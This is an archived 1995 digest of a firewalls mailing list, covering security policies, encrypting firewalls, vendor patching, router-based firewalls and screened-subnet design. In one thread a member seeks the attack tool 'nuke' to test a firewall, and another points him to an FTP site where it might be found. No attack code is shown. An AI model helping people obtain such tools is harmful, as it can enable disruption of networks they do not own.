From: s0ujgg@pacific.fnma.COM (Joseph Gerrity)
Message-Id: <9505021619.AA10068@pacific.fnma.com>
To: firewalls@greatcircle.com
Subject: Policies
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Our organization is in need of a policy/standard for future Internet connection. Would anyone out there be willing to share example policies that they might have in place? Or provide pointers online where examples might exist.

Thanks,
Joe Gerrity

From firewalls-owner Tue May 2 12:17:12 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA14342 for firewalls-outgoing; Tue, 2 May 1995 11:16:14 -0700
Received: from uuneo.neosoft.com (uuneo.NeoSoft.COM [198.64.6.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA14337 for ; Tue, 2 May 1995 11:16:11 -0700
Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id NAA07268 for GreatCircle.COM!firewalls; Tue, 2 May 1995 13:04:30 -0500
Received: by ris1.nmti.com (smail2.5) id AA00751; 2 May 95 12:43:41 CDT (Tue)
Received: by sonic.nmti.com; id AA13195; Tue, 2 May 1995 13:04:02 -0500
Message-Id: <9505021804.AA13195@sonic.nmti.com.nmti.com>
To: Brad Isley
Cc: firewalls@GreatCircle.COM
Subject: Re: TRUST US and other hooui
In-Reply-To: Your message of "Tue, 02 May 95 13:20:12 EDT." <199505021720.NAA03400@sb.lanier.com>
X-Mailer: exmh version 1.4.1 7/21/94
Date: Tue, 02 May 95 13:04:02 -0500
From: peter@nmti.com
X-Mts: smtp
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Which is magnitudes more difficult to produce than a stereo unit using VERY SIMPLE line in / line out signal levels and 12.8 volt power.

I wouldn't begin to think of designing a stereo unit. Especially not a low end unit designed for cheap manufacture. There's an enormous amount of work that goes into one of those things. You can't just brute force your way out of a corner when you're manufacturing in quantity.

--
Peter da Silva `-_-'
Network Management Technology Incorporated 'U`
1601 Industrial Blvd. Sugar Land, TX 77478 USA
+1 713 274 5180 "Har du kramat din varg idag?"
From firewalls-owner Tue May 2 12:36:33 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA10882 for firewalls-outgoing; Tue, 2 May 1995 09:11:34 -0700
Received: from brimstone.soscorp.com (soscorp.soscorp.com [204.52.248.130]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10877 for ; Tue, 2 May 1995 09:11:31 -0700
Received: from fearless.soscorp.com (fearless.soscorp.com [204.52.249.130]) by brimstone.soscorp.com ($Revision: 2.8 $/8.6.12/8.6.4.287) with BSMTP id BS0024403/MAA24404; Tue, 2 May 1995 12:11:50 -0400
Received: (ari@localhost) by fearless.soscorp.com (8.6.10/8.6.4.287) id MAA24701; Tue, 2 May 1995 12:11:38 -0400
Date: Tue, 2 May 1995 12:11:38 -0400
From: ari@soscorp.com (Ari Shamash)
Message-Id: <199505021611.MAA24701@fearless.soscorp.com>
To: "Patrick Stingley"
Cc: Firewalls@GreatCircle.COM
Subject: Re: Firewalls-Digest V4 #279
In-Reply-To: <9504027994.AA799431761@smtpgate.ssmc.noaa.gov>
References: <9504027994.AA799431761@smtpgate.ssmc.noaa.gov>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Our Brimstone firewall product optionally implements swIPe, which is a mechanism for encrypting IP packets between two hosts that understand swIPe. The firewall can be set up to decrypt the packets before they are forwarded as well (standard feature of swIPe). We are keeping up with the standards bodies by working on an IPSP implementation.

swIPe was written by John Ioannidis and Matt Blaze. Information (including an Internet Draft, Usenix paper and implementation) is available at ftp://ftp.csua.berkeley.edu/pub/cypherpunks/swipe/.

Ari Shamash
SOS Corporation

>>>>> On Tue, 02 May 95 08:10:42 EST, "Patrick Stingley" said:

Patrick> Does anybody know of a firewall other than TIS's Gauntlet or Raptor's Eagle/Eaglet that does IP encryption? (This is where the TCP(UDP)/IP packet is encrypted and a destination IP address prepended for another firewall across the Internet. Once received at the destination firewall, the encrypted packet is decrypted and sent to the appropriate host) I am not asking this due to problems with TIS or Raptor, but as a result of trying to complete some research into this area.

From firewalls-owner Tue May 2 13:02:30 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15793 for firewalls-outgoing; Tue, 2 May 1995 11:59:31 -0700
Received: from mailstorm.dot.gov (mailstorm.dot.gov [152.120.130.150]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA15788 for ; Tue, 2 May 1995 11:59:27 -0700
Received: by mailstorm.dot.gov id AA00282 (5.67b/IDA-1.5 for firewalls@GreatCircle.com); Tue, 2 May 1995 15:00:23 -0400
Date: Tue, 2 May 1995 14:57:54 -0400 (EDT)
From: Mark Barnes
Subject: Re: nuke vs firewalls
To: Sick Puppy
Cc: firewalls@GreatCircle.com
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi Sick Puppy,

I took a look via Archie for NUKE and it turned up the FTP site, "en.ecn.purdue.edu" in the sub-directory /nuke. I hope that is what you are looking for.

Regards,

Mark

On Mon, 1 May 1995, Sick Puppy wrote:

> I would like to run nuke against a firewall and see what the firewall spits out. Unfortunately I don't have nuke. NASIRC knows where to find it but they won't tell. Can anyone tell me where to pick up a copy of nuke?
>
> Sick Puppy
> the Cat_Eating_Dawg
> U.S. Dept. of InJustice
>
>
>

From firewalls-owner Tue May 2 13:11:48 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15711 for firewalls-outgoing; Tue, 2 May 1995 11:53:28 -0700
Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA15704 for ; Tue, 2 May 1995 11:53:23 -0700
Received: from cixgate by relay2.UU.NET with SMTP id QQyoad20648; Tue, 2 May 1995 14:53:35 -0400
Received: from manzanita.DEV.3Com.COM.noname ([139.87.180.206]) by cixgate (4.1/SMI-4.1/3com-cixgate-GCA-931027-01) id AA11792; Tue, 2 May 95 18:29:22 GMT
Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) id AA27117; Tue, 2 May 95 11:22:58 PDT
Date: Tue, 2 May 95 11:22:58 PDT
From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg)
Message-Id: <9505021822.AA27117@manzanita.DEV.3Com.COM.noname>
To: firewalls@greatcircle.com
Subject: Shameless Self Promotion (3Com Routers)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Thanks to all who wrote requesting copies of my article on how to build an Internet firewall with a 3Com router. Some of you asked for electronic copies, and I wasn't able to provide any at the time. The article is now on the 3Com web page (http://www.3Com.COM / 192.156.136.11) under Technical Info.

By the way, the one person who suggested not using 3Com routers to build a firewall turns out to not believe in using ANY router to build a firewall. Obviously I have philosophical differences with that. However, I think that the main point (also made in the article) is that NO one component is a firewall unto itself, but rather that ALL components related to Internet connections (regardless of brand name) need to be considered as part of a given firewall.

Thanks for your support,

BobK

From firewalls-owner Tue May 2 13:13:41 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15430 for firewalls-outgoing; Tue, 2 May 1995 11:49:11 -0700
Received: from Disclosure.COM (di.disclosure.com [199.97.230.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA15392 for ; Tue, 2 May 1995 11:48:45 -0700
Received: by Disclosure.COM (4.1/SMI-4.1) id AA15788; Tue, 2 May 95 14:50:56 EDT
Date: Tue, 2 May 1995 14:50:46 -0400 (EDT)
From: Scott Barman
To: Rick Smith
Cc: firewalls@GreatCircle.COM
Subject: Re: TRUST US and other hooui
In-Reply-To: <199505021544.KAA03682@shade.sctc.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 2 May 1995, Rick Smith wrote:

> Peter da Silva replied:
> > You mean like non-working turn signals?
>
> In a car, the problem was limited to the electrical system handling low wattage devices. It didn't affect the ignition and thus affect the car's mission critical behavior. Changes to security software are

Hmm... I don't know what it's like in Minnesota, but in the five states I've held a driver's license, using signal lights is more than a good idea, it's the law. Sounds like a mission critical item to me!!

> rarely as well constrained. Software patches can yield race conditions or infinite loops that shut down service entirely, or could modify data passing through the security software. These flaws directly affect the system's overall mission and aren't always obvious from the source code.

Oh... I see. So if your company patches your product that changes the way the logging data is written that breaks scripts my clients use to produce reports for the management types, this is not a problem because it has nothing to do with the "mission critical" (I hate that overabused term) nature of the system. And rarely are subtle changes to logging documented or properly documented (I've seen this before!). So what if my signals/reports don't work! The car/firewall starts and is running, what should I care, right?

> Rick.
> smith@sctc.com roseville, minnesota

scott barman
scott@disclosure.com
(I speak for myself... nobody else wants me to speak for them!! 8-)

From firewalls-owner Tue May 2 13:28:29 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA11046 for firewalls-outgoing; Tue, 2 May 1995 09:21:10 -0700
Received: from Disclosure.COM (di.disclosure.com [199.97.230.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA11021 for ; Tue, 2 May 1995 09:20:54 -0700
Received: by Disclosure.COM (4.1/SMI-4.1) id AA15217; Tue, 2 May 95 12:17:40 EDT
Date: Tue, 2 May 1995 12:17:40 -0400 (EDT)
From: Scott Barman
To: Frank Byrum
Cc: Frank Byrum , firewalls@greatcircle.com
Subject: Re: Source Code
In-Reply-To: <9505021510.AA04553@vbv03.vbv.dec.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 2 May 1995, Frank Byrum wrote:

> On Tue, 2 May 1995, Scott Barman replies:
> >On Mon, 1 May 1995, Frank Byrum wrote:
> >> Who is responsible if your change causes a security problem?
> >
> >Whoever made the change is responsible.
> I would like to think this is true.

It is. As a consultant I know that if I make a change I am responsible. If I forget it, a company is not afraid to hire lawyers to remind me of such. And that's on both sides--the customer and the company whose code I modified. That's why I prefer to keep my changes to a minimum. However, if you're dealing with a vendor who has a Micro$haft-like attitude, sometimes you have no choice.

> >Why should you support local changes? I do not know of a single vendor who does. As part of your source distribution, you tell the customer that if they make changes, they do so at their own risk--and you put it in writing!
> Agreed! But this does not keep customers from asking or even pointing to a problem that they have induced as one of ours.

True... but I've always made sure to point out to the customer their changes and how it affected the code. However, I handle it differently depending on the customer. A pain in the rear pays, a good customer buys me lunch!! :-)

> >I do work for you, you change my work, it's no longer my responsibility. It's just that simple!
> Oh to wish that it was as that simple!

True... especially in this litigious society!

> I wish that this was universally true, but it is not. I can not tell you the number of times that I have spent looking for a bug in a large system, only to find that the customer made one minor change (that of course would not affect the system, so why even mention it) that took a while to find.

I know it happens. I've been there. But you have to draw the line somewhere and make the customer understand the impact of what they do. Network security and firewalls are touchy subjects now and customers are going to have to play by certain rules or they get burned. The handful of customers I've had are bright people but have networking and network security knowledge equivalent to that of the early 80s pee cee owner who teaches himself BASIC and thinks he's a maven because they can spell TCP/IP. I've had problems with two of my installations because of this--and I have a "maintenance" agreement with them. I let them know where their mistakes were and warned them that when the initial agreement runs out (1 year), I cannot support their hacking. I do it nicely, but I am serious about it. Only one understands (the other falls in the category of a bit brain! ;-).

> I do feel responsible for the code that I write. I also feel responsible for the overall system that we deliver.
Daily, I spend > time with customers trying to understand what they like/dislike and > need. This information goes back into the engineering process in hopes of > developing a better product. That's good. I like to hear that from someone at a vendor! I think ALL vendors should be like this. I am tired of the line "it's not a bug, it's a feature!" scott barman scott@disclosure.com From firewalls-owner Tue May 2 14:11:39 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA16397 for firewalls-outgoing; Tue, 2 May 1995 12:20:01 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA16392 for ; Tue, 2 May 1995 12:19:58 -0700 Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via SMTP; Tue, 2 May 1995 11:40:52 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-5.67b/res.client.cf-3.7) id AA28630; Tue, 2 May 1995 11:40:50 -0400 Date: Tue, 2 May 1995 11:40:50 -0400 From: long-morrow@CS.YALE.EDU (H Morrow Long) Message-Id: <199505021540.AA28630@SPARKY.CF.CS.YALE.EDU> To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V4 #279 Cc: stingley@apwk01g1.nws.noaa.gov Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Dear Fellow Firewallers, > > Does anybody know of a firewall other than TIS's Gauntlet or Raptor's > Eagle/Eaglet that does IP encryption? (This is where the TCP(UDP)/IP > packet is encrypted and a destination IP address preprended for another > firewall across the Internet. Once received at the destination > firewall, the encrypted packet is decrypted and sent to the appropraite > host) I am not asking this due to problems with TIS or Raptor, but as > a result of trying to complete some research into this area. > > Thanks in advance, > > Patrick T. Stingley > (301) 713-0882 x104 > stingley@apwk01g1.nws.noaa.gov > MorningStar`s PPP implementation can be used to create an encrypted virtual link between two endpoints. 
NSC (Network Systems Corporation) has a router that can encrypt the body of IP datagrams but leave the IP headers unencrypted so that they may be routed over an internet. The feature that implements this on their router is called DPF for Data Privacy Facility. You can find out more about it at the URL http://www.network.com/. - Morrow From firewalls-owner Tue May 2 14:14:01 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA17272 for firewalls-outgoing; Tue, 2 May 1995 13:03:22 -0700 Received: from pmsw.army.mil (PMSW.ARMY.MIL [147.57.7.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA17260 for ; Tue, 2 May 1995 13:03:12 -0700 Received: from vinthill-pmsw.army.mil (vinthill-pmsw.army.mil [147.57.7.100]) by pmsw.army.mil (8.6.9/8.6.9) with SMTP id QAA02584 for ; Tue, 2 May 1995 16:05:10 -0400 Received: from cc:Mail by vinthill-pmsw.army.mil id AA799455747; Tue, 02 May 95 15:57:57 EST Date: Tue, 02 May 95 15:57:57 EST From: "Rosenthal, Stephen" Encoding: 12 Text Message-Id: <9504027994.AA799455747@vinthill-pmsw.army.mil> To: firewalls@GreatCircle.COM Subject: Firewall Products Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All, We are getting ready to set up a direct connection to the Internet and we're interested in setting up a firewall. Can anyone recommend some firewall products that they have had success with? 
Thanks, Steve From firewalls-owner Tue May 2 14:15:13 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA16980 for firewalls-outgoing; Tue, 2 May 1995 12:49:02 -0700 Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA16969 for ; Tue, 2 May 1995 12:48:55 -0700 Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id OAA03033; Tue, 2 May 1995 14:42:24 -0500 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma003029; Tue May 2 14:42:11 1995 Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA24956 (5.67b/IDA-1.5); Tue, 2 May 1995 14:51:48 -0500 Date: Tue, 2 May 1995 14:51:48 -0500 From: Ken Hardy Message-Id: <199505021951.AA24956@ignatz.bridge.com> To: mccomb@interport.net Subject: Re: libc for DNS without NIS ? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk DaVe asked: >Could someone please send me instructions on creating a "libc" under SunOS >4.1.3 that uses DNS instead of NIS. I've seen it posted in the past, but >can't seem to find it now. I think the original document was called >"Making a libc.so for DNS without NIS." This is topic #1 in comp.sys.sun.admin monthly FAQ. -KH From firewalls-owner Tue May 2 15:51:03 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA22119 for firewalls-outgoing; Tue, 2 May 1995 14:58:07 -0700 Received: from all.net (all.net [204.7.229.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA22107 for ; Tue, 2 May 1995 14:57:56 -0700 From: fc@all.net (Dr. Frederick B. 
Cohen) Received: by all.net (4.1/3.2.012693-Management Analytics); id AA08822 for firewalls@greatcircle.com; Tue, 2 May 95 17:53:59 EDT Message-Id: <9505022153.AA08822@all.net> Subject: Re: Source Code To: firewalls@greatcircle.com Date: Tue, 2 May 1995 17:53:58 -0400 (EDT) In-Reply-To: from "Scott Barman" at May 2, 95 12:17:40 pm X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 2138 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am astonished that so many people on this list think that making a software modification is so risky. I agree that in poorly designed, written, and documented software, changes may be very tricky, but then there are likely errors in that software already. A typical change I make to software is to remove items from the top-level case statement so as to reduce functionality - to add a function call to make a string lowercase on output to a log file so that sorts will group like things together - or to add information to output logs for detecting specific events - or to add a function to the top-level case statement which turns on a switch that enables some special function I have added to the program. If done with reasonable caution, these sorts of changes are highly unlikely to create the problems we read of, and in addition, such problems will only exist in the code I have introduced, thus providing a degree of security through obscurity. Naturally, all such changes should be thoroughly tested and documented and have an easy back-out mechanism. As far as vendors go, I normally identify the changes to the vendor (in a commercial situation) and get their (perhaps grudging) approval after the fact. This helps reduce the support problem significantly, and in some cases, introduces an option into the next version of the software. 
Having said all this (which is far more than any of us probably should have said about this in the firewalls digest), I would like to identify that two vendors claim to have GUI management tools that allow distributed management of many firewalls from one easy-to-use interface. I assume that the other vendors do not have this. -- ----------------- \Management /\/| 216-686-0090 - PO Box 1480, Hudson, OH 44236 \ /\/ | Check out info-security heaven and test your system \/\ /\/ | for known vulnerabilities (1st time for free) at URL: \/Analytics| (scans deeper than SATAN or ISS) http://all.net:8080 ----------------- Read "Protection and Security on the Information Superhighway" John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95 From firewalls-owner Tue May 2 16:10:12 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA21620 for firewalls-outgoing; Tue, 2 May 1995 14:44:12 -0700 Received: from sierra.corsof.com (sierra.corsof.com [198.22.44.240]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA21577 for ; Tue, 2 May 1995 14:44:01 -0700 Message-Id: <199505022144.OAA21577@miles.greatcircle.com> Received: from granite.corsof.com by sierra.corsof.com with ESMTP (8.6.10/16.2) id RAA09184; Tue, 2 May 1995 17:44:21 -0400 Received: from dana.corsof.com by granite.corsof.com with SMTP (1.37.109.16/16.2) id AA292620201; Tue, 2 May 1995 17:30:01 -0400 X-Sender: dana@pop.corsof.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 May 1995 17:42:52 -0400 To: firewalls@greatcircle.com From: DanaNowell@corsof.com (Dana Nowell) Subject: Re: TRUST US and other hooui Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rick Smith wrote: > >> > I think the problem with software is that the side effects of changes >> > are much, much harder to predict and control... A properly installed >> > stereo isn't going to blow the fuses or drain the battery. 
>
>Peter da Silva replied:
>
>> Neither will a properly installed compatible patch.
>
>The point is that it's much easier to evaluate the correctness of a
>stereo installation in a car than it is to evaluate whether a patch is
>"properly installed" and "compatible." I don't have any figures on the
>failure rate for stereo installations, but they can't possibly be as
>risky as software patching.
>
>> > Also, the
>> > most likely failure modes decrease your enjoyment of your car but are
>> > unlikely to risk your life and safety.
>>
>> You mean like non-working turn signals?
>
>In a car, the problem was limited to the electrical system handling
>low wattage devices. It didn't affect the ignition and thus affect the
>car's mission critical behavior. Changes to security software are
>rarely as well constrained. Software patches can yield race
>conditions or infinite loops that shut down service entirely, or could
>modify data passing through the security software. These flaws
>directly affect the system's overall mission and aren't always obvious
>from the source code.
>

I suppose when the auto dealer swaps out the computer controller that controls the throttle, timing, etc. via software in the latest and greatest revision PROM I'm also at low risk :-). In today's environment just about everything has software wrapped in its belly somewhere. I doubt (but don't know) that after-market controller manufacturers, the guys printing auto parts cross-ref manuals (used by 'junkyard' owners), or even the original manufacturer is doing complete failure mode analysis. The same holds for the basic $99 microwave oven (assuming it even has a PROM). Add to that the people writing 'toolkit' software who do testing but not massive failure analysis testing (not cost effective at that price point), and then find someone has used their toolkit to build a 911 emergency response system.
Face it, software is everywhere; if you want to worry about it or be scared about it, visit the Risks group and ask questions. Personally I find it unreasonable to hold someone to a higher standard than the guy building auto controllers, airplane nav systems, 911 systems, or any other life threatening/saving 'toys' containing software. As I see it, the issue is really, what is considered 'reasonable'. Do I believe my patch is as reliable as the vendor's will be? As with everything else, assumed risk is the bottom line. Is the risk of making the patch less than the risk of going without it? There are few absolutes in life. Sometimes you risk it and patch it, sometimes you wait. Sometimes you add functionality, sometimes you do without. You 'pays your money and takes your chances' just like everyone else. Just remember, if you change it, test hell out of it; it's usually the best you can do in the practical world.

Dana Nowell                    Work: DanaNowell@corsof.com
Cornerstone Software Inc.      Home: dnowell@mv.mv.com
I don't even believe myself, why should you! (Standard disclaimer in force).

From firewalls-owner Tue May 2 16:39:37 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA24411 for firewalls-outgoing; Tue, 2 May 1995 15:51:59 -0700
Received: from ix2.ix.netcom.com (ix2.ix.netcom.com [199.182.120.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA24397 for ; Tue, 2 May 1995 15:51:45 -0700
Received: from by ix2.ix.netcom.com (8.6.12/SMI-4.1/Netcom) id PAA03039; Tue, 2 May 1995 15:50:50 -0700
Date: Tue, 2 May 1995 15:50:50 -0700
Message-Id: <199505022250.PAA03039@ix2.ix.netcom.com>
From: casares@ix.netcom.com (michael smith)
Subject: Re: Policies
To: s0ujgg@pacific.fnma.COM (Joseph Gerrity)
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

You wrote:
>
>Our organization is in need of a policy/standard for future Internet connection.
>Would anyone out there be willing to share example policies that they might have in place. Or provide pointers online where examples might exist.
>
>Thanks, Joe Gerrity
>

Our organization is in the same boat. Are there any outlines available?

From firewalls-owner Tue May 2 16:49:47 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24901 for firewalls-outgoing; Tue, 2 May 1995 16:02:15 -0700
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA24884 for ; Tue, 2 May 1995 16:02:05 -0700
Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQyoau00578; Tue, 2 May 1995 19:02:15 -0400
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA28014; Tue, 2 May 95 18:57:38 EDT
Date: Tue, 2 May 1995 18:57:36 -0400 (EDT)
From: Sick Puppy
Subject: Re: nuke vs firewalls
To: Mark Barnes
Cc: firewalls@GreatCircle.com
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Thanks, but nope, taint in there. Done got one copy of nuke.c but there usually be several versions of these critters hacked to varying extents, so that some are more useful than others. Still looking.

Come on you CERT and CIAC and DISA d00dz, where can I find nuke?

Sick Puppy the Cat_Eating_Dawg
Simple country boy, who do simple things.
From firewalls-owner Tue May 2 17:37:49 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA27573 for firewalls-outgoing; Tue, 2 May 1995 17:02:00 -0700
Received: from jax.jaxnet.com (jax.jaxnet.com [204.183.221.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA26210 for ; Mon, 1 May 1995 23:56:31 -0700
Received: from slip13.unf.edu (jax.jaxnet.com [204.183.221.4]) by jax.jaxnet.com (8.6.9/8.6.9) with SMTP id DAA27248 for ; Tue, 2 May 1995 03:00:55 -0400
Date: Tue, 2 May 1995 03:00:55 -0400
Message-Id: <199505020700.DAA27248@jax.jaxnet.com>
X-Sender: bwern@jax.jaxnet.com
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Firewalls@GreatCircle.COM
From: bwern@jax.jaxnet.com (Ben Wern)
Subject: Help with begining options?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello. This may not specifically be in the charter, but I'm asking anyways. I'm trying to learn as much as possible about firewalls, etc. for my upcoming pitch for an internet connection for my company. If you guys/gals have a free second, I'd love it if you could look at what I am proposing, poke holes in it, and tell me where to go for more information. If not, just delete, but I'd appreciate it if you have the time.

My current design consists of a router to connect to the 56k or ISDN link. The router dumps into an unsecure subnet that consists of whatever sacrificial lamb machines I have serving the outside world, and the Firewall. The firewall connects to our internal network. The firewall should allow any outgoing traffic, but restrict incoming traffic to ONLY SMTP to one machine inside the net. All other servers (FTP, WWW, etc.) are in the unprotected network.

My question lies in the Firewall server.
I've been looking into Janus (or BorderWare, or whatever they're calling it now), but that seems to force us into using their application servers, and might limit us as far as options go. I've also been looking into Gauntlet, from TIS, and just using the FWTK kit. Unfortunately, I'm not expecting much money for this, so I expect I'll be forced to scrimp. :(

Anyone care to offer thoughts, etc. for a new firewalls person?

Thanks,
Ben Wern
bwern@jaxnet.com  | PGP Key available by Finger!
bwern@pathtech.com| PGP Mail gets priority!
bwern@unf6.edu    | Ask for it by name!
"I used to get disgusted, but now I just get amused"

From firewalls-owner Tue May 2 17:46:01 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA27750 for firewalls-outgoing; Tue, 2 May 1995 17:04:21 -0700
Received: from ninurta.fer.uni-lj.si (ninurta.fer.uni-lj.si [193.2.72.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10978 for ; Tue, 2 May 1995 09:19:56 -0700
Received: from olymp.fer.uni-lj.si (janb@olymp.fer.uni-lj.si [193.2.72.11]) by ninurta.fer.uni-lj.si (8.6.10/8.6.10) with ESMTP id SAA19633 for <@ninurta.fer.uni-lj.si:Firewalls@GreatCircle.COM>; Tue, 2 May 1995 18:20:19 +0200
Received: by olymp.fer.uni-lj.si (940816.SGI.8.6.9/931108.SGI.ANONFTP) for Firewalls@GreatCircle.COM id SAA03577; Tue, 2 May 1995 18:20:05 +0200
From: janb@olymp.fer.uni-lj.si (Jan Bervar)
Message-Id: <199505021620.SAA03577@olymp.fer.uni-lj.si>
Subject: Screened subnet with one router?
To: Firewalls@GreatCircle.COM
Date: Tue, 2 May 1995 18:20:04 +0200 (MDT)
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1544
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi there,

I am currently designing a firewall and am faced with a difficult decision. Please help me out on this one...
Is there any difference in the security of a screened subnet firewall using two routers (one serial-ethernet, the second ethernet-ethernet) as opposed to using one router with serial-ethernet-ethernet interfaces?

---------------------------------------------------------------------
First design:
                  --       DMZ       --
Internet  -->    |R1|-------------|R2|-----  inside net
                  --     bastion     --
                          host
---------------------------------------------------------------------
The second one:
                  --
Internet  -->    |R1|-------  inside net
                  --      b.
                   |      host
                   |DMZ
                   |
                   -
---------------------------------------------------------------------

In both instances, it is impossible to avoid going through the DMZ and the bastion host (with packet filtering on the router(s)). The only problem I see is breaking into the first router in the second design, but if I allow access to the router only via console, then I see no difference.

The second design also saves you around $3500 (at least here) for a Cisco 2501 (I am thinking of using the 2514 for the dual-ethernet router).

Many many thanks in advance,

--
Jan Bervar * jan.bervar@snet.fer.uni-lj.si * http://www.fer.uni-lj.si/~janb
---------------------------------------------------------------------------
FER Security Team * The S-Net project * HP-UX & Linux admin * guitarist

From firewalls-owner Tue May 2 18:09:19 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA28572 for firewalls-outgoing; Tue, 2 May 1995 17:19:55 -0700
Received: from nisc.jvnc.net (nisc.jvnc.net [128.121.50.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA28562 for ; Tue, 2 May 1995 17:19:48 -0700
Received: from shaddam.usb.ve (shaddam.usb.ve [159.90.10.10]) by nisc.jvnc.net (8.6.4/8.6.4) with SMTP id UAA04527; Tue, 2 May 1995 20:19:23 -0400
Received: by shaddam.usb.ve (4.1/USB-4.5.1) id AA01893; Tue, 2 May 95 20:28:30-040
Date: Tue, 2 May 95 20:28:30-040
From: lem@shaddam.usb.ve (LDC - Luis E. Mun~oz)
Message-Id: <9505030028.AA01893@shaddam.usb.ve>
To: armandoe@netcom.com, firewalls@greatcircle.com
Subject: SUMMARY: BSDI as a screening router
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The original question was about the alternatives available to use a BSDI box as a bridging router. The answers received mentioned the following solutions:

screend: Many experiences (mainly satisfactory) with the software. Reported performance is that a 486@33MHz can pump about 5Mb/s and a Pentium about 9Mb/s. Good enough to handle a site with a 64Kbit/s.

ip_firewall: Consists of kernel patches (no source license required) and a couple of source files. It's reported to be shareware. Its author is danny@nahanni.BouletFermat.ab.ca. The program is available at the following sites:
  ftp://ftp.nebulus.net/pub/bsdi/security/ipfirewall_v2.0a.gz
